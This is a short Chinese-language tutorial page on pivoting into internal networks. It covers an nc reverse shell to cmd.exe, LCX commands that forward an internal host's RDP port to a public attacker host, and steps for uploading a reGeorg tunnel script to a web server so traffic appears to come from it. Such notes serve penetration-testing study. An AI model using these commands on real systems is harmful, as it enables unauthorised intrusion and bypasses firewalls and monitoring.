赞
踩
端口转发工具lcx
Web代理脚本regeorg
Shell反弹脚本nc 、VPN
nc:nc首先对公网主机端口进行监听,再到内网输入公网IP,端口号,以及执行文件,比如cmd.exe,就可以成功反弹内网主机的shell
第一个是 LCX 对 windows 3389 的转发;
第二个是 reGeorg 通过上传对应脚本(PHP/ASPX/JSP),然后全局代理进一步内网渗透;
第三个是 EarthWorm
LCX:
1)端口转发(listen和slave成对使用 2)端口映射(tran)
Windows版是lcx.exe,Linux版为portmap,
lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389
(1)首先内网主机的 3389 端口转发到具有公网ip主机的 4444 端口
lcx.exe –listen 4444 5555
(2)其次是监听公网主机本机的 4444 端口请求,并将来自 4444 端口的请求传送给 5555 端口。
此时已经把内网的3389端口转发到了公网的5555端口。可以通过127.0.0.1:5555连接到内网的远程桌面。
还有一种情况就是3389出不了防火墙,他还有一项功能就是端口映射,你吧3389映射到一个不被限制的端口就可以直接远程桌面链接了。
reGeorg+proxifier内网代理+端口转发:
目的:攻击者A 通过web应用B 看内网主机C, 在C上查看流量发现是B访问的而非攻击者。
步骤如下:
第一步: 上传tunnel 文件 到 Web应用B
第二步: 在A 上,使用reGeorgSocksProxy.py 并指定端口
第三步: 设置自己的代理Proxifier 或者SocksCap64(本次使用的是proxifier)
第四步: 在C上使用wireshark 查看流量信息。(当然也可以查看日志)内网端口通过http/https转发到本地,然后本地使用socks5正向代理穿透防火墙到达服务器,即是一个环路。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。